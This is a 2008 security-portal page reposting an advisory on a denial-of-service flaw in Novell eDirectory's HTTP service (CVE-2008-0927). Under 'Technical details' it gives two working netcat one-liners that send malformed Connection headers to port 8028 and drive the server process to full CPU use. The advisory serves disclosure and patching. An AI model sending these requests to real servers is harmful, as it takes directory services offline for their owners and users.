Members Login

Rss Feeds

Get our latest content via RSS feeds.

Report a Vulnerability

Report a vulnerability or exploit that you have found to SecuMania.
vul[at]SecuMania.org

advertise with us

add your link here only ($10/month)

Google PageRank Checker
 

Recommended Links

Most downloaded

Latest Comments

thanks smiley
莆田SEO www.0594seo.com.cn 莆田SEM搜索引擎优化营销 www.ptsem.org.cn
hi webmaster,plz help me to find any information about account harvesting and traversal path attack ...
[…] self-propagating malware in the first place. Share this post: email it! | bookmark it! | digg ...
Hello Webmasters My name is Nikolai. I am making an organization for the protection internet users f...
good job you are the best . mgharba talmout :d
Hello, The reported problem has been fixed. Regards, Catalina Danila Online Rent Customer Supp...
Not Vulnerable: Luis Wang netOffice Dwins 1.3.1 visit website http://netofficedwins .sourceforge.ne...
Current version of script corrected. Security patch available to registered users in the user foru...
But i think to protect the password is not needed because it's not used in the SQL-Execute statement...

Who's Online

Total: 8
Members: 0 / Guests: 8
No members online

Packet Storm

Packet Storm Last 10 Exploits
Packet Storm Last 10 Advisories
Packet Storm Last 10 Tools
Packet Storm Last 10 Miscellaneous Files
Packet Storm Headlines

Links

viralcoders

lzer
Visits today: 568
Visits yesterday: 911
Visits month: 19662
Visits total: 65970
Pages total: 930404
Novell eDirectory < 8.7.3 SP 10 / 8.8.2 HTTP headers DOS Vulnerability Print E-mail
0
Monday, 05 May 2008

Novell eDirectory < 8.7.3 SP 10 / 8.8.2 HTTP headers DOS Vulnerability
Author: Nicob
Date: 2008-05-05
Download: exploits , vulnerabilities , articles , Novell eDirectory < 8.7.3 SP 10 / 8.8.2 HTTP headers DOS Vulnerability 

[=] Affected software :
 
  Editor : Novell
  Name : eDirectory
  Version : < 8.7.3 SP 10 and < 8.8.2
  Services : TCP/8028 (HTTP) and TCP/8030 (HTTPS)
 
[=] External references :
 
http://www.novell.com/support/viewContent.do?externalId=3829452&sliceId=1
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0927
 
[=] Technical details :
 
The dhost.exe process will consume 100% of a CPU. More than one request
can be used to lock every CPU.
 
Two "Connection:" headers : echo "GET / HTTP/1.0"; echo "Connection:
foo"; echo "Connection: bar"; echo; echo) | nc -vn 192.168.1.1 8028 
 
One "Connection:" header with two values : (echo "GET / HTTP/1.0"; echo
"Connection: foo, bar"; echo; echo) | nc -vn 192.168.1.1 8028
 
Nicob
 

Set as favorite
Bookmark
Email This
Hits: 71
Comments (0)add
Write comment
quote
bold
italicize
underline
strike
url
image
quote
quote
smile
wink
laugh
grin
angry
sad
shocked
cool
tongue
kiss
cry
smaller | bigger

busy
 
< Prev   Next >
[ Back ]

Polls

How do you rate the SecuMania Security Portal?
 

Latest exploits

Latest vulnerabilities

Security

Spam

Viruses/Malware

Software/Programming

Linux

Microsoft

Technology

Fast Loans | Credit Cards | Savings Accounts | Debt | Car Insurancelinks VoteThisMovie PalKeys Hey3arab arabekia